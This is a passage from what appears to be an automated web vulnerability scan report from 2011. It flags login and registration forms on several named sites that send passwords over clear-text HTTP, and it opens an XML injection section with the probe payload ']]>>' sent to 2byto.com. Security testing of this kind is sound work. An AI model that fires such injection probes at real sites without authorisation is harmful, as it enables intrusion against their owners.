Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:05:40 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 7298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
</h1> <form name="Login" action="/login/" method="post"> <p class="error">
...[SNIP]...
<dd><input name="password" type="password" id="password" value=""/> <a href="/login/recover/" class="second">
...[SNIP]...

9.7. http://www.gcpowertools.com/Login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gcpowertools.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Login.aspx HTTP/1.1
Host: www.gcpowertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=quxbuzE5zAEkAAAANTBhMjNjZjctYWYxZC00ZWYzLWI4YmEtMGE4YWU2ODkyNmJh11sWO77u6CaMOxTpEVNroWhCSTY1; ASP.NET_SessionId=3oa45t334h4qnx45al4bl245; __utmz=111490962.1303663938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111490962.1783537933.1303663938.1303663938.1303663938.1; __utmc=111490962; __utmb=111490962.1.10.1303663938

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=10
Content-Type: text/html; charset=utf-8
Expires: Sun, 24 Apr 2011 16:56:30 GMT
Last-Modified: Sun, 24 Apr 2011 16:56:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 1.7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:56:20 GMT
Content-Length: 61775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<span class="txtWrapper">
<input name="ctl00$ContentPlaceHolderMain$txtPassword" type="password" maxlength="50" id="ctl00_ContentPlaceHolderMain_txtPassword" class="txt" value="" onkeypress="javascript:return KeywordSubmitOnEnter(event)" />
<span id="ctl00_ContentPlaceHolderMain_RequiredFieldValidator1" title="Please enter your password." class="PasswordRecoveryNotification" style="color:Red;visibility:hidden;">
...[SNIP]...

9.8. http://www.gcpowertools.com/Register.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gcpowertools.com
Path:   /Register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Register.aspx HTTP/1.1
Host: www.gcpowertools.com
Proxy-Connection: keep-alive
Referer: http://www.gcpowertools.com/products/SpreadforASPNET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=quxbuzE5zAEkAAAANTBhMjNjZjctYWYxZC00ZWYzLWI4YmEtMGE4YWU2ODkyNmJh11sWO77u6CaMOxTpEVNroWhCSTY1; ASP.NET_SessionId=3oa45t334h4qnx45al4bl245; __utmz=111490962.1303663938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111490962.1783537933.1303663938.1303663938.1303663938.1; __utmc=111490962; __utmb=111490962.1.10.1303663938

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 1.7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:56:22 GMT
Content-Length: 84947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/Register.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="FormSectionValue">
<input name="ctl00$ContentPlaceHolderMain$ctlRegister$CreateUserWizard1$CreateUserStepContainer$Password" type="password" id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_Password" onkeypress="return KeyPress(event);" style="width:200px;" />
<span id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_PasswordRequired" style="color:Red;visibility:hidden;">
...[SNIP]...
<td class="FormSectionValue">
<input name="ctl00$ContentPlaceHolderMain$ctlRegister$CreateUserWizard1$CreateUserStepContainer$ConfirmPassword" type="password" id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_ConfirmPassword" onkeypress="return KeyPress(event);" style="width:200px;" />
<span id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_ConfirmPasswordRequired" style="color:Red;display:none;">
...[SNIP]...

9.9. http://www.infusionblog.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<div id="loginPanelContent"><form id="loginForm" method="post" action=""><div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

9.10. http://www.infusionsoft.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=a5ec6edf213d896f3903101ca35e8f6b; expires=Wed, 18-May-2011 05:10:10 GMT; path=/; domain=.infusionsoft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:36:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:36:50 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password"/></dd>
...[SNIP]...

9.11. http://www.infusionsoft.com/about  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /about

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /about HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:25:46 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:06 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

9.12. http://www.infusionsoft.com/clients  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /clients

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /clients HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:40:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:27:08 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:40:27 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:40:29 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

9.13. http://www.infusionsoft.com/demo  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

9.14. http://www.infusionsoft.com/pricing  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /pricing

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pricing HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:19 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:20 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 29858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

9.15. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

POST /pcworldconnect/comment_registration?callingurl=http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674281645; JSESSIONID=00497792CB5578F6F5DDC4DEE6210001; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 6225


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

9.16. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</script>
               <form action="/component/user/" method="post" id="josForm" name="josForm" class="form-validate">
               
               <table cellpadding="0" cellspacing="0" border="0" width="100%" class="contentpane">
...[SNIP]...
<td>
                       <input class="inputbox required validate-password" type="password" id="password" name="password" size="40" value="" /> *
                   </td>
...[SNIP]...
<td>
                       <input class="inputbox required validate-passverify" type="password" id="password2" name="password2" size="40" value="" /> *
                   </td>
...[SNIP]...

9.17. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
<div class="top">
               <form action="/index.php" method="post" name="form-login" id="form-login" >
<ul class="loginposition">
...[SNIP]...
</label>
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="15" alt="password" />
</li>
...[SNIP]...

10. XML injection  previous  next
There are 129 instances of this issue:


10.1. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bluepixel]]>>/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:46:41 GMT
